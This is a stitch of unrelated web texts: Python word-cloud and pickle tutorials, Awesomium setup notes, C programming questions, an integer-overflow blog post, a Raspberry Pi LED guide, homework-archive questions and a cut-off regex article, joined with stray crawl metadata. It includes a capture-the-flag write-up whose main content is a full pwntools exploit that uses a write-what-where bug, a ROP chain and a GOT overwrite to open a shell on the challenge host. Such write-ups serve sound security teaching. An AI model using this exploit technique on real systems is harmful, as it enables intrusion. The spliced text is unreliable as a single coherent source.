- Regular Expressions for Web Scraping (Data Collection)
- Working with Date-Time features
- Using Regex for Text Pre-processing (NLP)
Extracting emails from a Text Document
A lot of times, the sales and marketing teams might require finding/extracting emails and other contact information from large text documents.
Now, this can be a cumbersome task if you are trying to do it manually! This is exactly the kind of situations when Regex really shines. Here’s how you can code a basic email extractor:
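The original code is embedded as a gist; a minimal sketch consistent with the description below (the sample text is assumed) would be:

import re

text = "Reach us at jane_doe42@example.com or support@example.org"
# word characters (a-z, 0-9, '_'), then '@', then word characters and dots
emails = re.findall(r'\w+@[\w.]+', text)
print(emails)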
Just replace the “text” with the text of your document and you are good to go. Here is an example output we got:
Amazing, isn’t it? In case you want to directly read a file and process it, you can simply add the file reading code to the Regex code:
The code might look scary but it is actually very simple to understand. Let me break it down for you. We use re.findall() to extract all the strings from the document which follow this format:
any character a-z, any digit 0-9 and symbol '_' followed by a '@' symbol and after this symbol we can again have any character, any digit and especially a dot.
Here is an image that would give you a better understanding of the same
Wasn’t that really simple? That’s the thing about Regex, it lets you perform really complex tasks with simple expressions!
Regular Expressions for Web Scraping (Data Collection)
Data collection is a very common part of a Data Scientist’s work and given that we are living in the age of internet, it is easier than ever to find data on the web. One can simply scrape websites like Wikipedia etc. to collect/generate data.
But web scraping has its own issues – the downloaded data is usually messy and full of noise. This is where Regex can be used effectively!
Suppose this is the HTML that you want to work on:
It is from a Wikipedia page and has links to various other Wikipedia pages. The first thing you can check is which topics/pages it has links for.
Let’s use the following regex:
import re
re.findall(r">([\w\s()]*?)</a>", html)
And to pull out the underlying link targets themselves:
import re
re.findall(r"\/wiki\/[\w-]*", html)
Working with Date-Time features
Most of the real world data has some kind of Date or Time column associated with it. Such columns carry useful information for the model, but since Date and Time have multiple formats available it becomes difficult to work with such data.
Can we use regex in this case to work with these different formats? Let us find out!
We will start with a simple example, suppose you have a Date-Time value like this:
date = "2018-03-14 06:08:18"
Let’s extract the “Year” from the date. We can simply use regex to find a pattern where 4 digits occur together:
import re
re.findall(r"\d{4}", date)
The same idea extends to other date formats too, for example a date written as "12th September, 2019".
Using Regex for Text Pre-processing (NLP)
When working with text data, especially in NLP where we build models for tasks like text classification, machine translation and text summarization, we deal with a variety of text that comes from diverse sources.
For instance, we can have web scraped data, or data that’s manually collected, or data that’s extracted from images using OCR techniques and so on!
As you can imagine, such diversity in data also implies a good amount of inconsistency. Most of this will not be useful for our machine learning task as it just adds unnecessary noise and can be removed from the data. This is where Regex really comes in handy!
Let’s take the below piece of text as an example:
As it’s evident, the above text has a lot of inconsistencies like random phone numbers, web links, some strange unicode characters of the form “\x86…” etc. For our text classification task, we just need clean and pure text so let’s see how to fix this.
We will write a function to clean this text using Regex:
Once you run the given code on the above text, you will see that the output is pretty clean:
So what did we do here? We basically applied a bunch of operations on our input string:
- Firstly, we removed all the irrelevant links from the text
# removing links (the exact pattern was lost in extraction; any URL-matching regex works)
newString = re.sub(r'(https?://\S+)', '', newString)
- We also removed all the digits (phone numbers)
# fetching alphabetic characters
newString = re.sub("[^a-zA-Z]", " ", newString)
- After that, we used another useful Python package, nltk, to remove stopwords such as "and", "the", "for" etc. from our text input
# removing stop words
from nltk.corpus import stopwords
stop_words = set(stopwords.words('english'))
tokens = [w for w in newString.split() if not w in stop_words]
- We made sure to ignore any word that is shorter than 4 characters, because abbreviations like "CET", "BHM" etc. do not add much information unless they are taken into context
# removing short words
long_words=[]
for i in tokens:
    if len(i)>=4:
        long_words.append(i)
return (" ".join(long_words)).strip()
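Putting the pieces together, the whole cleaning function might look like this (a sketch assembled from the snippets above; the post's exact function is not reproduced, and the URL pattern is an assumption):

import re
from nltk.corpus import stopwords

stop_words = set(stopwords.words('english'))

def clean_text(text):
    # remove links (assumed pattern)
    newString = re.sub(r'(https?://\S+)', '', text)
    # keep alphabetic characters only
    newString = re.sub("[^a-zA-Z]", " ", newString)
    # drop stopwords
    tokens = [w for w in newString.lower().split() if not w in stop_words]
    # drop words shorter than 4 characters
    long_words = [i for i in tokens if len(i) >= 4]
    return (" ".join(long_words)).strip()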
So that’s text pre-processing, isn’t it fascinating? You can learn all about text pre-processing from this intuitive blog:
End Note
In this article we saw some simple yet useful ways of using Regular expressions. Yet, we barely scratched the surface of the capabilities of this great tool.
I encourage you to dig deeper and understand how Regex works (as they can be quite confusing in the beginning!) rather than simply using them blindly.
Here are some resources that you can follow to know more about them:
- Regex101 – It is a very useful website to visualize and understand how Regex works under the hood.
- Regex Documentation for Python 3
- Regex Quickstart CheatSheet – This is for those who want to quickly revise regex operators.
Have you used Regex before? Do you want to add an application to this list that I missed? Answer in comments below!
|
https://www.analyticsvidhya.com/blog/2020/01/4-applications-of-regular-expressions-that-every-data-scientist-should-know-with-python-code/?utm_source=feed&utm_medium=feed-articles
|
CC-MAIN-2022-21
|
refinedweb
| 1,197
| 60.04
|
how to link the object file to a Qt
Hi,
I wrote a simple program in the terminal:
vi test.c
which displays "Hi".
I compiled test.c with the cross-compiler "arm-linux-gnueabihf-gcc" and generated an object file.
Next I copied that object file onto my BeagleBone board using
scp test debian@192.168.7.2:/test
Now I want to link this object file, which is present on the BeagleBone board, into Qt.
Is it possible to link this object file into Qt? If yes,
then please suggest how to link it. What are the steps to link that object file into Qt?
- mrjj Lifetime Qt Champion last edited by mrjj
Hi
In your Qt project file on the beagleboneboard, add
LIBS += THEFILE.o
and make sure that the .o file is in the project folder.
This assumes that its the same compiler on the board as the one
that produced the .o file.
Wild variation in compiler versions might prevent it from working.
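For example, a minimal .pro could look like this (file names assumed):
# myapp.pro
QT      += core gui
TARGET   = myapp
SOURCES += main.cpp
LIBS    += $$PWD/test.o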
Hi,
"In your Qt project file on the beagleboneboard, add
LIBS += THEFILE.o"
It means I have to add that LIBS +=file.o to my beagleboard test file(executable file)?
- mrjj Lifetime Qt Champion last edited by mrjj
Hi
you must add it to the project on the board so you can compile the .-o into your new exe file.
if you try to just add an .o file to an already-built exe, that won't work.
Sorry,
But I am not getting this
"you must add it to the project on the board"(in board I have only one executable file,that is test)
I need to add it on my qt project file in my system?
- mrjj Lifetime Qt Champion last edited by
@asha
Hi
You need to add it to the .pro file that produces the Qt application.
So it can be linked into the new exe file.
You cannot add it to an already compiled app.
So you need to add the .o to the project file for the app where you want to include the .o file.
Hi,
I am running the application in Qt, but I am not getting the output in the Qt Creator app;
I am getting the result on the VNC platform, via the command prompt.
So I created a .pro file from the command prompt and linked the object file (a C++ object file). While executing this object file I get the result in the command prompt, not on the VNC platform.
So my question is: is it possible to link .cpp files into Qt projects? If yes, how?
the cpp file is:
#include <iostream>
using namespace std;
int main()
{
cout<<"Hello World";
return 0;
}
- mrjj Lifetime Qt Champion last edited by
@Asha
Hi
You can just include the wanted .cpp in the .pro file or
make file or whatever you use to compile. You can also link it into the project as an .o file. However, if you have a main in the new .cpp that won't work, as
there already is a main for the Qt app.
Im not sure what you mean by
"while executing this object file getting the result in command prompt ,not in vnc platform.."
|
https://forum.qt.io/topic/106981/how-to-link-the-object-file-to-a-qt
|
CC-MAIN-2019-47
|
refinedweb
| 528
| 82.65
|
...one of the most highly
regarded and expertly designed C++ library projects in the
world. — Herb Sutter and Andrei
Alexandrescu, C++
Coding Standards
At CPPCon 2016 Jon Kalb gave a very entertaining (and disturbing) lightning talk related to C++ expressions.
The talk included a very, very simple example similar to the following:
// Copyright (c) 2018 Robert Ramey
//
// Distributed under the Boost Software License, Version 1.0. (See
// accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)

#include <iostream>
#include <boost/safe_numerics/safe_integer.hpp>

int main(){
    std::cout << "example 4: ";
    std::cout << "implicit conversions change data values" << std::endl;
    std::cout << "Not using safe numerics" << std::endl;
    // problem: implicit conversions change data values
    try{
        signed int a{-1};
        unsigned int b{1};
        std::cout << "a is " << a << " b is " << b << '\n';
        if(a < b){
            std::cout << "a is less than b\n";
        }
        else{
            std::cout << "b is less than a\n";
        }
        std::cout << "error NOT detected!" << std::endl;
    }
    catch(const std::exception &){
        // never arrive here - just produce the wrong answer!
        std::cout << "error detected!" << std::endl;
        return 1;
    }

    // solution: replace int with safe<int> and unsigned int with safe<unsigned int>
    std::cout << "Using safe numerics" << std::endl;
    try{
        using namespace boost::safe_numerics;
        safe<signed int> a{-1};
        safe<unsigned int> b{1};
        std::cout << "a is " << a << " b is " << b << '\n';
        if(a < b){
            std::cout << "a is less than b\n";
        }
        else{
            std::cout << "b is less than a\n";
        }
        std::cout << "error NOT detected!" << std::endl;
        return 1;
    }
    catch(const std::exception & e){
        // never arrive here - just produce the correct answer!
        std::cout << e.what() << std::endl;
        std::cout << "error detected!" << std::endl;
    }
    return 0;
}
example 4: implicit conversions change data values
Not using safe numerics
a is -1 b is 1
b is less than a
error NOT detected!
Using safe numerics
a is -1 b is 1
converted negative value to unsigned: domain error
error detected!
A normal person reads the above code and has to be dumbfounded by
this. The code doesn't do what the text - according to the rules of
algebra - says it does. But C++ doesn't follow the rules of algebra - it
has its own rules. There is generally no compile time error. You can get a
compile time warning if you set some specific compile time switches. The
explanation lies in reviewing how C++ reconciles binary expressions (a < b is an expression here) where the operands are of different types. In processing this expression, the compiler:
Determines the "best" common type for the two operands. In
this case, application of the rules in the C++ standard dictate that
this type will be an
unsigned int.
Converts each operand to this common type. The signed value of -1 is converted to an unsigned value with the same bit-wise contents, 0xFFFFFFFF, on a machine with 32 bit integers. This corresponds to a decimal value of 4294967295.
Performs the calculation - in this case it's
<, the "less than" operation. Since 1 is less than
4294967295 the program prints "b is less than a".
In order for a programmer to detect and understand this error he should be pretty familiar with the implicit conversion rules of the C++ standard. These are available in a copy of the standard and also in the canonical reference book The C++ Programming Language (both are over 1200 pages long!). Even experienced programmers won't spot this issue and know to take precautions to avoid it. And this is a relatively easy one to spot. In the more general case this will use integers which don't correspond to easily recognizable numbers and/or will be buried as a part of some more complex expression.
This example generated a good amount of web traffic along with everyone's pet suggestions. See for example a blog post with everyone's favorite "solution". All the proposed "solutions" have disadvantages and attempts to agree on how handle this are ultimately fruitless in spite of, or maybe because of, the emotional content. Our solution is by far the simplest: just use the safe numerics library as shown in the example above.
Note that in this particular case, usage of the safe types results in no runtime overhead in using the safe integer library. Code generated will either equal or exceed the efficiency of using primitive integer types.
|
https://www.boost.org/doc/libs/develop/libs/safe_numerics/doc/html/tutorial/4.html
|
CC-MAIN-2020-50
|
refinedweb
| 721
| 53.31
|
At 03:53 9/8/00 -0700, you wrote:
>As far as I understood the difference is in which ClassLoader space 'blah'
>will be loaded. If you use *only* system class loader there is no
>difference,
>if you use your own class loaders you can drop into the problem (for example
>with security), cause first method loads class in the namespace of system
>(bootstrap)
>class loader, second in the namespace of class from the left of .getClass().
yep thats right so.
getClass().getClassLoader().loadClass("blah")
loads blah from the classloader that was used to load the current class. This means
if you use classloaders that expand your classpath then you will always
load from the primordial loader rather than the current one.
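In code terms (a sketch):
// resolves "blah" through the loader that loaded the current class
ClassLoader current = getClass().getClassLoader();
Class viaCurrent = current.loadClass("blah");
// resolves "blah" through the system class loader only
Class viaSystem = ClassLoader.getSystemClassLoader().loadClass("blah");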
There are also some serious issues when you need to resolve classes that
occur higher up in classpath hierarchy that require classes lower down or
when you are running in a secured environment 1.2+ (Specifically with
associating ProtectionDomains to CodeSources)
Cheers,
Pete
*------------------------------------------------------*
| "Nearly all men can stand adversity, but if you want |
| to test a man's character, give him power." |
| -Abraham Lincoln |
*------------------------------------------------------*
|
http://mail-archives.apache.org/mod_mbox/ant-dev/200008.mbox/%3C3.0.6.32.20000810113213.008961a0@latcs2.cs.latrobe.edu.au%3E
|
CC-MAIN-2015-27
|
refinedweb
| 180
| 54.97
|
Hi!

[ Had this sitting here half drafted, but as I got poked privately also due to the apparent incoherence in the first part, I'm sending the reply for that now. And will handle the other part later on.

Although, I guess, because it might be only partly on topic, I'm considering whether it might be better to do more extensive write-ups elsewhere on my website or similar, to articulate it properly, and then possibly link it here, as then I'd also have a reference to point to. Because I do realize (or at least that seems apparent) that mine is probably a very minority view within the project, and that people going on and on with this kind of tirades and ramblings become annoying and/or tiresome fast. So then I could try to stop interjecting on the subject, while evaluating how much these situations bother me until they become unbearable, at which point I'd just disengage and distance myself from work involving them. ]

On Tue, 2018-07-31 at 19:43:32 -0700, Russ Allbery wrote:
The root problem is that AFAICS there's been at least three different ways the interested parties have expressed a desire they wanted this getting enforced, for quite different reasons, that have gotten mingled in here: * Ban this everywhere at the dpkg level (dgit and Ubuntu interest). * Ban this for all Debian at the ftp-master/lintian level via policy (Ubuntu interest, fallback dgit interest). * Ban this at the vendor level (Ubuntu interest) Ideally? Yes, I'd like for any of the interested parties to get the users of the feature and possibly convince them they are doing it wrong, and if so why, and what they could do instead, or for the complaining part to realize this might have some merit, and solve the apparent problems they have with technical means. But for the Ubuntu case, which is what I was explicitly discussing with Steve, the reality is slightly different. The Ubuntu organization is reigned by their own rules, and it's a different entity to Debian, and how they reach their conclusions and policies is for them to decide, and even if how they do that might not be my cup of tea, I'm just not involved and I don't think it's my place to question their processes. So, if Ubuntu, as an organization, decides that the ubuntu.series file is not good for them, and they are going to ban it no matter what, probably at their boundaries. Asking ftp-masters or lintian maintainers to honor that wish and do that for them would just help them, and not change the outcome much. Those two teams could obviously decide they do not want to be in the middle of possibly angry maintainers and the derivative, but that's for these teams to decide. I'm not sure why we'd reject that at the Debian level TBH. It's also in their namespace so it seems only fair they get to have a say IMO. Thanks, Guillem
|
https://lists.debian.org/debian-policy/2018/08/msg00083.html
|
CC-MAIN-2019-39
|
refinedweb
| 922
| 51.21
|
Alex Schroeder <address@hidden> writes:

> One good solution to this problem is to write interactive functions
> for the most useful cases so that you can call them directly. There
> need not be many of them:
>
> compare-windows-sync-word
> compare-windows-sync-sentence
> compare-windows-sync-defun
> compare-windows-sync-regexp -- this one would query for a regexp

Adding the interactive function for syncing seems to be a good thing. But what troubles me the most is the namespace wasting. Instead of creating n number of compare-windows-sync-* functions it's better to create one interactive function (e.g. compare-windows-sync-windows) which when called with argument C-u will ask the user for a function name (e.g. forward-word, forward-sentence) or a regexp (anyhow, one of your proposed functions asks for a regexp) and will set the buffer-local compare-windows-sync variable to this function or regexp. If compare-windows-sync-windows is called without C-u, it could use the previously saved value of compare-windows-sync.

--
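A rough sketch of such a command (names as proposed above; illustrative only):

(defun compare-windows-sync-windows (arg)
  "Compare windows; with prefix ARG, first ask for a sync function or regexp."
  (interactive "P")
  (when arg
    (set (make-local-variable 'compare-windows-sync)
         (read-from-minibuffer "Sync function or regexp: " nil nil t)))
  (compare-windows nil))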
|
http://lists.gnu.org/archive/html/emacs-devel/2003-08/msg00178.html
|
CC-MAIN-2016-50
|
refinedweb
| 175
| 50.87
|
06 March 2012 11:48 [Source: ICIS news]
By Elaine Burridge and Andy Brice
After years of unparalleled growth,
With
According to Keller, the Chinese government is intelligently mastering the economy. There is still enough funding available to provide a reasonable subsidy policy for social infrastructure projects and fiscal revenues are very solid, he said.
“The Chinese economy has been quite strong over the last few years and what we expect is a soft landing, which means that annual growth rates will come down to approx 8%,” said Keller. “But we see that the Chinese government has actions as well as financial resources in place to manage a soft landing in a reasonable and structured way.”
Currently, GDP in
Keller pointed out that some 35% of private consumption makes up
The major change we will see in
As a result, the health and education sectors will thrive in the coming years and become core industries.
From an investment perspective, growth will be more selective in the future, said Keller, with more attention paid to small- and medium-sized enterprises (SMEs) and less on the larger projects.
“I think there are a number of challenges the Chinese chemical industry has to face. One is that the industry structure needs to change. We are currently seeing a large number of small, entrepreneurial companies and we see a limited number of huge strong conglomerates. What we are missing in
For all its growth,
“Definitely for the next 10 years, exports to Europe and the
“There is no
|
http://www.icis.com/Articles/2012/03/06/9538430/video-china-is-slowing-but-still-strong-says-consultant.html
|
CC-MAIN-2014-42
|
refinedweb
| 256
| 56.59
|
SETREGID(2)                 BSD Programmer's Manual                SETREGID(2)

NAME
     setregid - set real and effective group IDs

SYNOPSIS
     #include <unistd.h>

     int setregid(gid_t rgid, gid_t egid);

DESCRIPTION
     The real and effective group IDs of the current process are set
     according to the arguments. If the real group ID is changed, the saved
     group ID is changed to the new value of the effective group ID.
     Unprivileged users may change either group ID to the current value of
     the real, effective, or saved group ID. Only the superuser may make
     other changes. Supplying a value of -1 for either the real or effective
     group ID forces the system to substitute the current ID in place of the
     -1 parameter.

     The setregid() function was intended to allow swapping the real and
     effective group IDs in set-group-ID programs to temporarily relinquish
     the set-group-ID value. This purpose is now better served by the use of
     the setegid() function (see setuid(2)).

     When setting the real and effective group IDs to the same value, the
     setgid() function is preferred.
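A minimal usage sketch (illustrative; not part of the original page):

     #include <unistd.h>
     #include <stdio.h>

     int main(void)
     {
             /* drop the effective group ID back to the real group ID */
             if (setregid((gid_t)-1, getgid()) == -1) {
                     perror("setregid");
                     return 1;
             }
             return 0;
     }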
RETURN VALUES
     Upon successful completion, a value of 0 is returned. Otherwise, a value
     of -1 is returned and errno is set to indicate the error.

ERRORS
     [EPERM]  The current process is not the superuser and a change other
              than changing the effective group ID to the real group ID was
              specified.

SEE ALSO
     getgid(2), setegid(2), setgid(2), setresgid(2), setuid(2)

STANDARDS
     The setregid() function conforms to the IEEE Std 1003.1-2001 ("POSIX")
     and X/Open Portability Guide Issue 4.3 ("XPG4.3") specifications. Note,
     however, that prior to IEEE Std 1003.1-2001 ("POSIX"), the setregid()
     function was not a part of the IEEE Std 1003.1 ("POSIX") specification.
     As a result, it may not be implemented on all systems.

HISTORY
     The setregid() function call appeared in 4.2BSD. A semantically
     different version appeared in 4.4BSD. The current version, with the
     original semantics restored, appeared in OpenBSD 3.3.

CAVEATS
     The setregid() function predates POSIX saved group IDs. This
     implementation changes the saved group ID to the new value of the
     effective group ID if the real group ID is changed. Other
     implementations may behave differently.

MirOS BSD #10-current           January 29
|
https://www.mirbsd.org/htman/i386/man2/setregid.htm
|
CC-MAIN-2015-48
|
refinedweb
| 372
| 65.93
|
I want to modify a module xyz and its functions like that:
def modify(fun):
    modulename = fun.__module__  # this is a string. ok, but not enough

import xyz
modify(xyz.test)
My problem is how to access the namespace of xyz inside modify. Sometimes globals()[fun.__module__] works, but then I get problems if the definition of modify is in a different file than the rest of the code.
Use the inspect module:
import inspect

def modify(fun):
    module = inspect.getmodule(fun)

This is the same as polling the module from sys.modules using fun.__module__, although getmodule tries harder even if fun does not have a __module__ attribute.
You want to get the module object from its name? Look it up in the sys.modules dictionary that contains all currently loaded modules:

import sys

def modify(func):
    module = sys.modules[func.__module__]
You could try:

modulename = fun.__module__
module = __import__(modulename)
You do not want to do this.

It does not work. Imagine you defined a function in module abc and then imported it in xyz. test.__module__ would be 'abc' when you called modify(xyz.test). You would then know to change abc.test, and you would not end up modifying xyz.test at all!

Monkey patching should be avoided. Fooling with the global state of your program is ill-advised. Instead of doing this, why can't you just make the new, modified thing and use it?
|
https://techstalking.com/programming/python/getting-corresponding-module-from-function/
|
CC-MAIN-2022-40
|
refinedweb
| 245
| 61.83
|
Sorting glyphs by "density"
- RicardGarcia last edited by
Hello, lately I have been thinking about using a typeface to generate some images using glyphs as "pixels" depending on whether they have less or more black. I guess the process to do so is to use a grayscale image and assign one glyph or another for each pixel depending on how light or how dark it is.
Do you have any idea how to generate this and group glyphs, for instance, in 4 groups from lightest to darkest?
Thanks!
hello @RicardGarcia,
there are probably different ways to define the ‘density’ of a glyph. in this example, it is defined as the ratio between the glyph area and the total glyph box area:
from fontTools.pens.areaPen import AreaPen

CHARS = 'abcdefghijklmnopqrstuvwxyz$%&@'
FONTNAME = 'Menlo-Bold'
FONTSIZE = 1000

# set font properties
fontSize(FONTSIZE)
font(FONTNAME)
lineHeight(FONTSIZE)

# measure glyph densities and collect values in a dict
densities = {}
for char in CHARS:
    # get total area for glyph
    w, h = textSize(char)
    # get area of 'black' surface
    B = BezierPath()
    B.text(char, (0, 0), font=FONTNAME, fontSize=FONTSIZE)
    pen = AreaPen()
    B.drawToPen(pen)
    area = abs(pen.value)
    # calculate density as percentage of black
    density = area / (w * h)
    # store density value in dict
    densities[char] = density
you could also calculate density by rasterizing the glyph and counting the black pixels…
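for example, a rough sketch of the raster approach (assuming Pillow is importable from DrawBot):

from PIL import Image

newDrawing()
size(200, 200)
font(FONTNAME, 200)
text('a', (20, 40))
saveImage('_glyph.png')

img = Image.open('_glyph.png').convert('L')
dark = sum(1 for p in img.getdata() if p < 128)  # count dark pixels
density = dark / (img.width * img.height)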
hope this helps!
- RicardGarcia last edited by gferreira
Thanks @gferreira!
I didn't know that there were already functions that could calculate the area of a vector. It's nice to know that I could also calculate the number of pixels each character takes, but for now I'm totally fine with your suggestion using the "density" of a BezierPath().
I can use this useful piece of code to design what I have in mind so thanks a lot!
There may be useful code here:
|
https://forum.drawbot.com/topic/212/sorting-glyphs-by-density/3
|
CC-MAIN-2019-51
|
refinedweb
| 308
| 59.03
|
How to handle activation from a toast notification (HTML)
Note  Not using JavaScript? See How to handle activation from a toast notification (XAML).
Note  When testing toast notification code functionality through Microsoft Visual Studio, you must use either the Local Machine or Remote Machine debug setting on a Windows x86, x64, or Windows Runtime machine. You cannot use the Visual Studio Simulator debug option: your code will compile and run in the Simulator, but the toast will not appear.
Create your first Windows Store app using JavaScript.
Step 2: Register for the "activated" event
When the user clicks on your toast or selects it through touch, the activated event is fired. Your app must register through the addEventListener function to be informed of the event.
Note If you do not include a launch attribute string in your toast and your app is already running when the toast is selected, the activated event is not fired.
Step 3: Implement a handler for your toast's "activated" event
Your registered event handler receives all activation events, regardless of the activation type. The kind property included in the event notification indicates the type of activation event. When the user clicks on a toast that has a launch attribute specified in its XML payload, an activation event of kind launch is fired. This is the same event that is raised when a user taps on an app's primary or secondary tile.
The activation string that you provided through the launch attribute in step 1 is included in the event notification's arguments property.
This example shows the outline of the activated event handler registered in step 2.
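The sample's code is not reproduced in this extract; a minimal WinJS sketch of such a handler (names assumed) could look like:

var activation = Windows.ApplicationModel.Activation;

WinJS.Application.addEventListener("activated", function (args) {
    if (args.detail.kind === activation.ActivationKind.launch) {
        // the toast's launch attribute string, if one was provided
        var launchArgs = args.detail.arguments;
        // navigate or update state based on launchArgs here
    }
});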
Related topics
- Toast notifications sample
- Windows.UI.Notifications API namespace
- Toast notification overview
- Guidelines and checklist for toast notifications
- Quickstart: Sending a toast notification
- The toast template catalog
- Toast XML schema
|
http://msdn.microsoft.com/en-in/library/windows/apps/hh761468.aspx
|
CC-MAIN-2014-41
|
refinedweb
| 297
| 51.78
|
23 May 2012 03:47 [Source: ICIS news]
SINGAPORE (ICIS)--Asia’s largest synthetic rubber producer, South Korea’s Kumho Petrochemical (KKPC), has further cut the operating rates of its synthetic rubber plants because of weak market conditions, a company source said on Wednesday.
It has cut the operating rate of its 430,000 tonne/year styrene butadiene rubber (SBR) plant to 40-50% of capacity and its 350,000 tonne/year butadiene rubber (BR) plant to 60% of capacity, the source added.
Both the SBR and BR plants were running at reduced rates since early May.
“It is an emergency situation because of the continued weakness in demand. Both these plants will run at the reduced rates for at least two weeks until mid-June,” the source added.
SBR non-oil grade 1502 spot prices were at $2,900-3,000/tonne (€2,291-2,370/tonne) CIF (cost, freight, insurance)
BR spot prices were at $3,300-3,400/tonne CFR (cost and freight) northeast Asia
|
http://www.icis.com/Articles/2012/05/23/9562516/south-koreas-kumho-petrochemical-cuts-ops-on-weak-demand.html
|
CC-MAIN-2015-22
|
refinedweb
| 169
| 58.92
|
This blog will discuss features about .NET, both windows and web development.
The DataContext object supports using the TransactionScope object, defined in the System.Transactions namespace. You can easily do the following in your code:
using (TransactionScope ts = new TransactionScope())
{
    myContext.SubmitChanges();
    ts.Complete();
}
If there is an issue, it's raised as an exception and the changes are not submitted in that case.
Whenever you need to figure out what's changed, use the DataContext.GetChangeSet method, which returns a ChangeSet object. This object has Inserts, Updates, and Deletes collections of items that this action is being performed for. It's an object collection because it's got every LINQ class that fits into that category lumped into one collection.
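For example (a sketch; myContext is assumed to be your DataContext):
ChangeSet cs = myContext.GetChangeSet();
Console.WriteLine("{0} inserts, {1} updates, {2} deletes",
    cs.Inserts.Count, cs.Updates.Count, cs.Deletes.Count);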
When trying to get a panel to display dynamically in conjunction with the HoverMenuExtender, there are some issues with displaying the content while forcing a scrollbar using the overflow-x and overflow-y CSS styles. As a personal recommendation, to implement a vertical scrollbar for a panel, set the width and height for the panel appropriately, and set overflow-x: hidden and overflow-y: scroll in your style. This is what it took to implement scrolling for one of my projects.
When working with WPF, there is an adjustment to how objects are created that you may not be used to in other environments. Suppose you have a window whose XAML (lost in extraction) wires up an event handler that accesses other elements; the event can fire while InitializeComponent is still running, before those elements exist.

To prevent this, check the IsInitialized property on the form, and if not initialized, exit the method as such:
if (!this.IsInitialized) return;
That way, the initial firing of the event, when the window is initialized, is prevented. This is only needed when accessing other elements.
(The markup for the AJAX tab container and the server-side hookup of its client event was lost in extraction.) In order for this to work, a client-side script needs to be rendered, which can be added to the script manager. The script file has our client event handler as discussed above. This is the middle step, to register the script file.
Lastly, the following script accesses the tab container. It simply outputs information about the control raising the event:
/// <reference name="MicrosoftAjax.js"/>
// reconstructed sketch: the original handler body was lost in extraction
function onTabChanged(sender, e) {
    var msg = "";
    msg += "Header: " + sender.get_activeTab().get_headerText() + "\n";
    msg += "Active Index: " + sender.get_activeTabIndex() + "\n";
    msg += "ID: " + sender.get_element().id + "\n";
    msg += "Page: " + sender.get_element().ownerDocument.URL;
    alert(msg);
}
Third, each javascript class defines a get_element property that returns a reference to the underlying html element. The last one uses the ownerDocument property that gains reference to the underlying URL (this is not an add-on to javascript).
The following gets emitted:
Header: Test2
Active Index: 1
ID: tc
Page: (the page URL)
What you may not realize if you open up a converted VS 2008 project and get no intellisense is that the designer utilizes sort of a namespace inheritance approach. For instance, if you create a new AJAX client behavior javascript file, you will see this at the top:
/// <reference name="MicrosoftAjax.js"/>
This lets VS know to use the objects defined in this file, similar to how you use "using System.Web.UI.WebControls". There are a variety of options available, and if you look through the AJAX Control Toolkit code, you will find some different files you can import into your scripts.
A co-worker of mine was using LINQ to SQL and trying to write a query that connected across multiple data context objects connecting to different databases. However, this was an issue because LINQ doesn't allow this to happen. The LINQ object "knows" that it is part of a different data context, and a detailed message specifies that this isn't allowed to happen. So, what is the solution? One of the things we did was to pull back the first data source in a query, and call the ToList() option. We were pulling back one field anyway, so the ToList() option was a good option to separate the single value from the data context.
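A sketch of that pattern (entity and property names assumed):
// materialize the values from the first context so the second query
// no longer references a foreign DataContext
List<int> ids = ctx1.Orders.Select(o => o.CustomerId).ToList();
var customers = ctx2.Customers.Where(c => ids.Contains(c.Id)).ToList();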
I was developing today and got a StackOverflowException, and I quickly realized what it was. One of the ways you get this is if you do "too much" in the constructor; that is, you can do limited things in the constructor. If you get this from something you are doing in the constructor, that means you can't do it.
I also get this if you get a circular reference, meaning that you have a property like this:
public string Text
{
    get { return this.Text; }
}
This is a recursive, infinite loop when accessed, when you really meant to do this:
public string Text
{
    get { return _text; }
}
So watch out for those things, and know that this exception may mean you have an infinite loop in your code.
I was wondering if it was possible to change the AJAX tab container and its child TabPanel controls. The reason is; the white background conflicted with my color scheme. In doing some research, I found this:
See, the tabcontainer control defines some in-line styles that it uses, and it's possible to override them by specifying that particular name (like ajax__tab_body) as a child class such as this:
.MyStyle .ajax__tab_body
{
    /* some style */
}
This MyStyle style can be applied to the tabcontainer, and the body will be overridden. I tried that, and overrode all of my styles, including the image tabs! There wasn't any header. So, I ended up scrapping it for now, but maybe some of this may make some sense to you. Maybe I set it up wrong, and I hope that maybe you can have better success than me.
|
http://dotnetslackers.com/Community/blogs/bmains/archive/2008/02.aspx
|
crawl-003
|
refinedweb
| 901
| 61.46
|
What that article doesn't mention, and the key benefit in my project, is that when you use @Autowired, you can have the Spring-invoked initialization method marked as private, to avoid polluting your public API.
Spring config:
<!-- reconstructed sketch; the original config snippet was lost in extraction -->
<context:annotation-config/>
<bean class="very.public.api.StaticHub" name="dummyInstanceOfStaticHub"/>
<!-- the bean injected into StaticHub; implementation class assumed -->
<bean class="some.impl.MyInterfaceImpl" name="myPrecious"/>
Java class with static field (reconstructed sketch, consistent with the snippets below):

import org.springframework.beans.factory.annotation.Autowired;

public class StaticHub {
    private static MyInterface theStaticInstance;

    @Autowired
    private StaticHub(MyInterface instance) {
        theStaticInstance = instance;
    }

    public static MyInterface instance() {
        return theStaticInstance;
    }
}
This is a big improvement over my previous unsatisfactory solution, which was to use org.springframework.beans.factory.config.MethodInvokingFactoryBean with a public method on StaticHub like this:
<!-- reconstructed sketch of the old MethodInvokingFactoryBean approach -->
<bean class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
    <property name="staticMethod" value="very.public.api.StaticHub.setInstance"/>
    <property name="arguments">
        <list><ref bean="myPrecious"/></list>
    </property>
</bean>
You can also use @Qualifier to disambiguate if you have multiple beans in your Spring container which implement MyInterface:
import org.springframework.beans.factory.annotation.Qualifier;
...
private StaticHub(@Qualifier("myPrecious") MyInterface instance) {
    theStaticInstance = instance;
}
Before you use this, consider carefully whether static fields are actually a good idea - in general this kind of pattern is something Spring is designed to help you avoid!
In my project there are good reasons for it, but it needs thought - things get complicated quickly in environments with multiple classloaders, or with multiple Spring containers inside the same classloader; it also makes it harder to use newfangled clustering technologies which let you scale to multiple JVMs.
Nice Solution, Good Work.
Thank so much!
Nice work. I think there is also another difference when using the MethodInvokingFactoryBean. Where you can use the static method and not have the bean (that has the static method) in the container, the method is just used as initialization.
Using your beans as example
If you don't specify and just use the MethodInvokingFactoryBean declaration then since your static setInstance method returns void, there is no bean generated. I used this to initialize a class with just statics that i did not want in the container.
Looks like some of my comment got cut off since i used the xml notation. It should say
If you don't specify bean class="very.public.api.StaticHub" name="dummyInstanceOfStaticHub" and just use .....
Thanks alot...it worked for me !!!
It is NOT working in Spring 3.1.3. Whoever got it to work: are you using a different Spring version than 3.1.3?
